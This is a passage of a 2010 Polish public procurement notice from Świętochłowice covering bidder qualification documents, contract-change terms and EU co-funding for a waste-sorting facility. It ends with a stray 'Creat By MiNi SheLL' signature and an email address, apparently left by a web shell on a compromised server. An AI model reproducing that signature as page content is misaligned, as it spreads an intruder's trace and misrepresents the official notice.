Koszty operacyjne i wynagrodzenia całego personelu muszą zostać ujęte w cenie oferty.

UWAGA: Jedna z wyżej wymienionych osób musi pełnić funkcję Kierownika Zespołu Nadzoru Inwestorskiego, który stanowić będą te osoby. Zamawiający prosi o wskazanie  Kierownika Zespołu w Tabeli: Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia - Załącznik nr 5 niniejszej SIWZ. 

Zamawiający dopuszcza łączenie funkcji inspektorów poszczególnych branż wymienionych powyżej, pod warunkiem wykazania się niezbędnymi uprawnieniami i doświadczeniem dla każdej z branż.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez Wykonawcę spełnienia warunków w zakresie sytuacji ekonomicznej i finansowej wykonawca przedstawi: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 300 000,- zł 

Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika - do reprezentowania ich w postępowaniu o udzielenie zamówienia - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, albo - reprezentowania w postępowaniu - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, i zawarcia umowy w sprawie zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, zawarto we wzorze  umowy stanowiącym część SIWZ.

Zamawiający określa warunki zmian postanowień zawartej umowy na następujące:
a)	W zakresie terminu wykonania zamówienia pod warunkiem:
	konieczność wykonania zamówień dodatkowych uniemożliwiających wykonanie zamówienia podstawowego,	konieczności wykonania prac archeologicznych na terenie budowy,
	wystąpienie siły wyższej i innych zdarzeń nadzwyczajnych oraz niekorzystnych czynników atmosferycznych 
	podpisanie aneksu do umowy o dofinansowanie ww. inwestycji w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, zmieniającego zasady i terminy jej realizacji,
	zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
	termin może ulec przedłużeniu gdyby w trakcie wykonywania robót okazało się, że istnieją niezinwentaryzowane urządzenia podziemne i należy zmienić sposób wykonania zamówienia.
a)	W zakresie terminów płatności pod warunkiem:
	podpisanie aneksu do umowy o dofinansowanie ww. inwestycji w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, zmieniającego zasady i terminy jej realizacji,
c) w zakresie innym pod warunkiem: 
	aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
	zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
	zmiany podwykonawcy z przyczyn obiektywnych - za zgodą Zamawiającego.  
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
Nie stanowi istotnej zmiany umowy, w rozumieniu art. 144 ustawy z dn. 29.01.2004 r. - Prawo zamówień publicznych:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego),
b)	zmiana danych teleadresowych, zmiany osób reprezentujących Strony.

Nie przewiduje się żadnych przedpłat ani zaliczek na poczet realizacji przedmiotu umowy, a płatność nastąpi zgodnie z zapisami umowy i ofertą wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip@swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych pok. 306 ul. Katowicka 54, 41 - 600 Świętochłowice wersja papierowa w cenie 5 zł na pisemny wniosek wykonawcy - w cenie kosztu pokrycia druku i przekazania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 10:00, miejsce: Referat Zamówień Publicznych, Urząd Miejski w Świętochłowicach ul. Katowicka 54, 41 - 600 Świętochłowice..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Budowa linii do segregacji odpadów komunalnych wraz z infrastrukturą towarzyszącą na składowisku odpadów komunalnych w Świętochłowicach posiada dofinansowane ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, priorytet V Środowisko, działanie 5.2. Gospodarka odpadami stanowiącego program operacyjny Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com